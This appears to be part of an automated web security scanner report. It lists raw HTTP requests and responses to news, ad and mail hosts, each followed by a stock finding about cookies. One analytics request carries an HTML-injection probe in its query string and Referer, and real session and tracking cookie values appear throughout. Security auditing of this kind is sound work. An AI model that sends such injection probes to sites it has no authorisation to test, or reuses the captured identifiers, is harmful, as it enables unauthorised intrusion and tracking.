GET /A-List/Lifestyle/Mom-kills-teens.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:12 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=adae2bda89bb456997895c86d0995bea; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=606B6FED01FA4B74AC05FBCA266D2456; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:12 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17048
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Nathan-Woods-dies.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:07 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=43c0ed9dcd59405e97e0ca56ecbc5934; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=E67F9D21403E45ABB6A08727A2CBE039; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:07 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17060
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Professor-accused-defacing-colleagues-door.aspx?cp-documentid=27453665 HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:01 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA55 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=44c6713e16484bef8864fe79a72511ae; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=FCB994723662439EA7B8A5803A9422E2; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:01 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 23610
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Taco-Bell-fights-back.aspx?cp-documentid=27449852 HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:02 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=603578c5dd754321a5d5f718e6e3719e; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=0F1C39FCE6A54EAF8026C0BE98EE9363; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:02 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 23189
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/Lifestyle/Twitter-Death-Hoaxes-2010.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:14 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA52 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=3dac27f13e6f43ddbdd099e1136b2ed6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=C971D4F5C5424720A741D6E2B244FC0D; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:13 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17108
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /A-List/TV/Reality-show-and-housewives.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:51:30 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA49 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=57c44e4f157449418f258835ff8a2157; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=697F387490984D5091A88C7D9264CF7B; domain=.redacted; expires=Wed, 17-Aug-2011 23:51:30 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 17099
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /IEIncreaseFont_preview.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:54 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA53 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=0506a602688945e5ad28ee84c22b5f61; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=80780BE1B7C941D18D9BC03C02043CA7; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:54 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 13283
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /alphabet.aspx HTTP/1.1 Host: specials.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 23:50:56 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" S: BLUMPPRENA56 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Set-Cookie: MC1=V=3&GUID=f2b9f9c8edf64a949f8339bbfbc006f6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/ Set-Cookie: MUID=8F837BE9C6D04544883F495E86A13FAC; domain=.redacted; expires=Wed, 17-Aug-2011 23:50:56 GMT; path=/ Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 25485
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-gb" lang="en-gb" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 HTTP/1.1 Host: statse.webtrendslive.com Proxy-Connection: keep-alive Referer: http://www.scientificamerican.com/blog/observations/?9edcb%22%3E%3Ca%3E429173c9aec=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAADAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNAwAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETQAAAAA-
Response
HTTP/1.1 303 Object Moved Connection: close Date: Sun, 30 Jan 2011 17:14:52 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Location: /dcszbiart00000oiar2s6w5ud_4y9j/dcs.gif?dcsredirect=126&dcstlh=0&dcstlv=0&dcsdat=1296407694920&dcssip=www.scientificamerican.com&dcsuri=/blog/observations/&dcsqry=%3F9edcb%22%3E%3Ca%3E429173c9aec=1&dcsref=http://burp/show/60&WT.co_f=173.193.214.243-2605364368.30126492&WT.vtid=173.193.214.243-2605364368.30126492&WT.vtvs=1296407694981&WT.vt_f_tlv=0&WT.tz=-6&WT.bh=11&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Observations:%20Scientific%20American%20Blogs&WT.js=Yes&WT.jv=1.5&WT.ct=unknown&WT.bs=1036x1012&WT.fv=10.1&WT.slv=Unknown&WT.tv=8.6.0&WT.dl=0&WT.ndl=0&WT.ssl=0&WT.es=www.scientificamerican.com/blog/observations/&WT.cg_n=Scientific%20American&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1 Content-Length: 0 Set-Cookie: ACOOKIE=C8ctADE3My4xOTMuMjE0LjI0My0yNjA1MzY0MzY4LjMwMTI2NDkyAAAAAAAEAAAAtXsAAGwfLU1MHy1N4LYAANfxQk3H8UJNZuAAALAkRE2vJERNoPEAAIycRU2MnEVNBAAAAF4zAABsHy1NTB8tTQtFAADX8UJNx/FCTUtLAACwJERNryRETWpLAACMnEVNjJxFTQAAAAA-; path=/; expires=Thu, 10-Dec-2015 10:27:34 GMT P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: suzanne-choney.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:19:28 GMT Server: Apache/2.2.9 (Debian) Vary: negotiate,Accept-Encoding TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=6046a552d588b2b1ca9c2098d0a526d4; expires=Sat, 25-Jan-2031 02:19:28 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 79989
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tips-and-training/silverlight-tv-59-what-goes-into-baking-silverlight/ HTTP/1.1 Host: team.silverlight.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: graffitibot=88276BAEC15898589CE0128DE781EA8476A1CE3823C4D3FA4426E978A2FDAE634CF23B8AD0FAB134C870F690C10DFE9F670307A7E5E9060A5E8FE2F026AA4A6C2D8AD4364AF5EA28944FC7C079E1CCD15A344DB2A11751939870F26D9651152CAB5DEF057812D9394E1FE6DFD640DF20A36795453E312D77F68CDC4560698170CDD0198C914C388A31C09D86E6F3E4D9BBCECDA61E8CE8FEC911BFFAD5B4DC3CA7BD862D47665D3ECBC5FF177B083C68ECB07C25246C773E70D0A6B7E42A37DC58DC37FCB7C63095473F180490BD41E8DA4F6C86; expires=Sun, 30-Jan-2011 05:23:26 GMT; path=/ X-AspNet-Version: 2.0.50727 Set-Cookie: Graffiti-Post-278=278; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:23:26 GMT Connection: close Content-Length: 13643
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: technolog2.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:53:12 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=4d47ba7c4a967234cfe2368b17e3e89b; expires=Sat, 25-Jan-2031 02:53:12 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 83448
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/click.txt HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;
Response
HTTP/1.1 302 Found Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: Sun, 30 Jan 2011 01:51:08 GMT Location: http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1 Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: ac1=51f37.61f6d=0129111951; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0|c51F37:61F6D_0_0_0_20BC47_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 30 Jan 2011 01:51:08 GMT Content-Length: 226 Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:08 GMT;path=/
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://search.mylife.com/wp-people/?s_cid=DIS70b79249d87148edb59e29f186dfc0b753aa0a7422bf4444a8f1fff785ffedf1">here</ ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl HTTP/1.1 Host: this.content.served.by.adshuffle.com Proxy-Connection: keep-alive Referer: http://msn.whitepages.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v=576462396875340721; ts=1/29/2011+12:42:58+AM; z=4; sid=43118469-708a-43ea-a596-af6467b86b10; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.693f3=0128111859; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:693F3_0_0_0_20B673_0_0
Response
HTTP/1.1 200 OK Cache-Control: private, no-cache="Set-Cookie" Pragma: no-cache Content-Type: text/html Expires: Sun, 30 Jan 2011 01:29:45 GMT Server: Microsoft-IIS/7.0 P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Set-Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vc=; domain=by.adshuffle.com; expires=Tue, 01-Jan-1980 06:00:00 GMT; path=/ Set-Cookie: av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Set-Cookie: vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; domain=by.adshuffle.com; expires=Thu, 01-Jan-2099 06:00:00 GMT; path=/ Date: Sun, 30 Jan 2011 01:29:44 GMT Content-Length: 43 Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:34:45 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/kl/46/799/r/12/4/8/ast0k3n/VESIfHDf6VyGxLxswN5oXe8gB1ttrVL1UTNow8-ycNk5nkmECiF81g==/view.pxl/ HTTP/1.1 Host: this.content.served.by.adshuffle.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=7b2fbc92-cfda-4d32-8a9d-0293b3f8c07b; v=576462396875340721; ts=1/29/2011+12:42:58+AM; av1=c0596.66bcd=0114111510:b5d53.66348=0114111516:51f37.61f6d=0129111929; vcs0=vC0596:66BCD_0_0_0_2066CE_0_0|vB5D53:66348_0_0_0_2066D4_0_0|v51F37:61F6D_0_0_0_20BC31_0_0; vc=; z=4; NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 Date: Sun, 30 Jan 2011 01:51:09 GMT Content-Length: 0 Set-Cookie: NSC_betivggmf-opef=ffffffff0908153745525d5f4f58455e445a4a423660;expires=Sun, 30-Jan-2011 01:56:09 GMT;path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: toddkenreck.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:57:39 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=c66a118e1fcbecd5b536a96e40929013; expires=Sat, 25-Jan-2031 02:57:39 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 66367
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: top.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 03:00:36 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate,Host TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=91e5bf02a7007c2a6827929e99162d52; expires=Sat, 25-Jan-2031 03:00:36 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 44669
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /users HTTP/1.1 Host: top.newsvine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 30 Jan 2011 02:58:16 GMT Server: Apache/2.2.14 (Debian) Vary: negotiate,Host TCN: choice P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE" Set-Cookie: vid=a08b4d7ef3970ad6780f87b910dbac7c; expires=Sat, 25-Jan-2031 02:58:16 GMT; path=/; domain=.newsvine.com Pragma: no-cache Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 25806
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: tv.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 69709 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=dfa3666ab2b24263815b585d8424c2c2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:51:39 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> MSN TV: Ho ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tv/article.aspx?news=625552>1=28103 HTTP/1.1 Host: tv.redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Length: 54757 Content-Type: text/html; charset=utf-8 Expires: -1 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 Set-Cookie: stad=; path=/ Set-Cookie: MC1=V=3&GUID=62ae4f15c8c0486a828bffcaa09140f2; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/ X-Powered-By: ASP.NET Date: Sat, 29 Jan 2011 23:51:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"> <head><title> Source: Sh ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /mc/compose HTTP/1.1 Host: us.mc1125.mail.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Sun, 30 Jan 2011 01:22:08 GMT Set-Cookie: B=eb61ua56k9fa0&b=3&s=19; expires=Tue, 29-Jan-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Location: http://login.yahoo.com?.src=ym&.done=http%3A%2F%2Fus.mc1125.mail.yahoo.com%2Fmc%2Fcompose Vary: Accept-Encoding Content-Type: text/html; charset=utf-8 Cache-Control: private Age: 0 Connection: close Via: HTTP/1.1 r17.ycpi.ac4.yahoo.net (YahooTrafficServer/1.19.5 [cMsSf ]) Server: YTS/1.19.5
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
